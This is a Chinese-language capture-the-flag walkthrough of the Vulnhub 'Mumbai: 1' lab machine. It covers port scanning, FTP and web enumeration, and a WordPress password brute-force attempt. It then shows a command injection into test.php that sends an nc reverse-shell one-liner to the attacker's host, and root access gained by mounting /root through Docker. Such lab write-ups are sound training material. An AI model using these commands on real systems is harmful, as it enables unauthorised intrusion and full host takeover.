Vulnhub之Mumbai靶机详细测试过程

Mumbai

作者：jason huawen

靶机信息

名称： Mumbai: 1

地址：

https://www.vulnhub.com/entry/mumbai-1,372/

识别目标主机IP地址

─(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                                                                                                                                                                                     3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                             _____________________________________________________________________________   IP            At MAC Address     Count     Len  MAC Vendor / Hostname       ----------------------------------------------------------------------------- 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                                                            192.168.56.100  08:00:27:ff:33:41      1      60  PCS Systemtechnik GmbH                                                                                    192.168.56.243  08:00:27:50:a1:19      1      60  PCS Systemtechnik GmbH                      

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.243

NMAP扫描

──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.243 -oN nmap_full_scanStarting Nmap 7.92 ( https://nmap.org ) at 2023-04-04 02:45 EDTNmap scan report for bogon (192.168.56.243)Host is up (0.00012s latency).Not shown: 65530 closed tcp ports (reset)PORT     STATE SERVICE VERSION21/tcp   open  ftp     vsftpd 3.0.3| ftp-syst: |   STAT: | FTP server status:|      Connected to ::ffff:192.168.56.230|      Logged in as ftp|      TYPE: ASCII|      No session bandwidth limit|      Session timeout in seconds is 300|      Control connection is plain text|      Data connections will be plain text|      At session startup, client count was 3|      vsFTPd 3.0.3 - secure, fast, stable|_End of status| ftp-anon: Anonymous FTP login allowed (FTP code 230)|_-rw-r--r--    1 0        0             297 Sep 25  2019 Note22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   2048 e3:df:27:19:33:de:d4:2e:5e:33:d9:ab:74:df:38:80 (RSA)|   256 29:e2:b6:ef:b3:a0:43:7b:8a:a4:4b:f7:e8:41:1f:5b (ECDSA)|_  256 34:3a:48:af:b8:68:ab:53:18:62:d2:e4:08:74:e4:c3 (ED25519)80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))|_http-generator: comingsoonpage.com 1.0.0|_http-title: Mumbai SEO Services|_http-server-header: Apache/2.4.29 (Ubuntu)3306/tcp open  mysql   MySQL (unauthorized)8000/tcp open  http    nginx 1.14.0 (Ubuntu)|_http-title: Site doesn't have a title (text/html).|_http-open-proxy: Proxy might be redirecting requests|_http-server-header: nginx/1.14.0 (Ubuntu)MAC Address: 08:00:27:50:A1:19 (Oracle VirtualBox virtual NIC)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds

获得Shell

先尝试一下mysql是否有弱口令：

─(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]└─$ mysql -uroot -p -h 192.168.56.243Enter password: ERROR 1130 (HY000): Host '192.168.56.230' is not allowed to connect to this MySQL server

尝试结果表明远程机器无法连接数据库服务器，只允许本地访问。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]└─$ ftp 192.168.56.243                   Connected to 192.168.56.243.220 (vsFTPd 3.0.3)Name (192.168.56.243:kali): anonymous331 Please specify the password.Password: 230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls -alh229 Entering Extended Passive Mode (|||14114|)150 Here comes the directory listing.drwxr-xr-x    2 0        116          4096 Sep 25  2019 .drwxr-xr-x    2 0        116          4096 Sep 25  2019 ..-rw-r--r--    1 0        0             297 Sep 25  2019 Note226 Directory send OK.ftp> get Notelocal: Note remote: Note229 Entering Extended Passive Mode (|||55304|)150 Opening BINARY mode data connection for Note (297 bytes).100% |****************************************************************************************************************|   297      108.30 KiB/s    00:00 ETA226 Transfer complete.297 bytes received in 00:00 (77.90 KiB/s)ftp> put test.txt local: test.txt remote: test.txt229 Entering Extended Passive Mode (|||34115|)550 Permission denied.

对FTP服务的信息收集结果汇总：

1. 目标主机允许FTP匿名访问

2. 将Note下载到Kali Linux本地

3. 匿名用户无法上传文件

4. ftp服务版本无漏洞可利用。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]└─$ cat Note  TODO:Move these multiple HTTP Servers running to Docker. I hear containers make things inherentlysecure - maybe this will shut those security researchers up.Also, don't forget to remove all those privilege escalation exploits from /tmp - we don't want torebuild the server again.- AbsoZed

从Note内容看，应该是有容器的环境，也许可以利用容器进行本地提权。

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]└─$ gobuster dir -u http://192.168.56.243 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh,.js===============================================================Gobuster v3.5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.56.243[+] Method:                  GET[+] Threads:                 10[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.5[+] Extensions:              html,txt,sh,js,php[+] Timeout:                 10s===============================================================2023/04/04 02:52:30 Starting gobuster in directory enumeration mode===============================================================/.php                 (Status: 403) [Size: 279]/.html                (Status: 403) [Size: 279]/index.html           (Status: 200) [Size: 10243]/wordpress            (Status: 301) [Size: 320] [--> http://192.168.56.243/wordpress/]/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.243/javascript/]/drupal               (Status: 301) [Size: 317] [--> http://192.168.56.243/drupal/]/SEO                  (Status: 301) [Size: 314] [--> http://192.168.56.243/SEO/]/.html                (Status: 403) [Size: 279]/.php                 (Status: 403) [Size: 279]/server-status        (Status: 403) [Size: 279]Progress: 1320475 / 1323366 (99.78%)===============================================================2023/04/04 02:55:29 Finished===============================================================

Gobuster工具扫描出/drupaly以及/wordpress目录，前者为空目录，/wordpress目录应该是下一步信息收集的重点，利用的工具是wpscan:

──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]└─$ wpscan --url http://192.168.56.243/wordpress -e u,p [i] User(s) Identified:[+] absozed | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection)        

─$ wpscan --url http://192.168.56.243/wordpress -U absozed -P /usr/share/wordlists/rockyou.txt 

虽然wpscan工具扫描出用户名，但是在尝试利用wpscan工具破解密码时但运行十几分钟没有破解出密码。而且wpscan也没有扫描出可利用的插件，因此80端口方向只能作罢。

接下来看8000端口：

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]└─$ gobuster dir -u http://192.168.56.243:8000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.js,.txt,.html===============================================================Gobuster v3.5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.56.243:8000[+] Method:                  GET[+] Threads:                 10[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.5[+] Extensions:              html,php,sh,js,txt[+] Timeout:                 10s===============================================================2023/04/04 03:30:30 Starting gobuster in directory enumeration mode===============================================================/index.html           (Status: 200) [Size: 46]/test.php             (Status: 200) [Size: 64]

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]└─$ curl http://192.168.56.243:8000/test.phpPlease POST a proper query. ex: https://caffeinatedengineers.com     

从返回的内容来看，说明请求方法需要修改为POST，可以用burpsuite工具拦截请求，从而修改请求方法,即修改GET为POST

注意不要直接在Burp左侧修改请求头和请求体，修改结果其实是无效的，而是用右边的burpsuite来设置，比如修改Request mehod, 增加request body等等，因为在右侧修改内容，Burpsuite会做自动的字段补充，比如content-type等

也就是说可以利用命令包含漏洞，执行命令rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.230 5555 >/tmp/f

这样Kali Linux得到目标主机反弹回来的shell

┌──(kali㉿kali)-[~/Desktop/Vulnhub/Mumbai]└─$ sudo nc -nlvp 5555                                         [sudo] password for kali: listening on [any] 5555 ...connect to [192.168.56.230] from (UNKNOWN) [192.168.56.243] 40510which python/usr/local/bin/pythonpython -c 'import pty;pty.spawn("/bin/bash")'apiuser@mumbai:~$ 

提权

apiuser@mumbai:~$ docker imagesdocker imagesREPOSITORY          TAG                 IMAGE ID            CREATED             SIZEmigrationtest       v1                  ec8b7840f6aa        3 years ago         216MBubuntu              14.04               2c5e00d77a67        3 years ago         188MBapiuser@mumbai:~$ docker run -it -v /root:/mnt ubuntudocker run -it -v /root:/mnt ubuntuUnable to find image 'ubuntu:latest' locallydocker: Error response from daemon: Get https://registry-1.docker.io/v2/: dial tcp: lookup registry-1.docker.io: Temporary failure in name resolution.See 'docker run --help'.apiuser@mumbai:~$ docker run -it -v /root:/mnt ubuntu:14.04docker run -it -v /root:/mnt ubuntu:14.04root@224ee0f52adc:/# cd /mntcd /mntroot@224ee0f52adc:/mnt# ls -alhls -alhtotal 68Kdrwx------   6 root root 4.0K Sep 25  2019 .drwxr-xr-x   1 root root 4.0K Apr  4 07:54 ..-rw-r--r--   1 root root 3.1K Apr  9  2018 .bashrcdrwx------   3 root root 4.0K Sep 24  2019 .cachedrwxr-xr-x   3 root root 4.0K Sep 24  2019 .local-rw-------   1 root root   74 Sep 24  2019 .mysql_historydrwxr-xr-x 399 1000 1000  12K Sep 24  2019 .npm-rw-r--r--   1 root root  148 Aug 17  2015 .profile-rw-------   1 root root    7 Sep 24  2019 .python_historydrwx------   2 root root 4.0K Sep 24  2019 .ssh-rw-r--r--   1 root root 9.2K Sep 24  2019 .v8flags.6.2.414.50.root.json-rw-r--r--   1 root root  174 Sep 24  2019 .wget-hsts-rw-r--r--   1 root root  603 Sep 25  2019 proof.txtroot@224ee0f52adc:/mnt# cat proof.txtcat proof.txt8""8""8                                  8""""8 8"""" 8"""88 8  8  8 e   e eeeeeee eeeee  eeeee e     8      8     8    8 8e 8  8 8   8 8  8  8 8   8  8   8 8     8eeeee 8eeee 8    8 88 8  8 8e  8 8e 8  8 8eee8e 8eee8 8e        88 88    8    8 88 8  8 88  8 88 8  8 88   8 88  8 88    e   88 88    8    8 88 8  8 88ee8 88 8  8 88eee8 88  8 88    8eee88 88eee 8eeee8                                                              By: AbsoZed                                                                                                                         Congratulations! Hope you enjoyed the box!Proof: 4370445fbc9eaa490589b55a8ae4494fhttps://caffeinatedengineers.comroot@224ee0f52adc:/mnt# 

STRIVE FOR PROGRESS,NOT FOR PERFECTION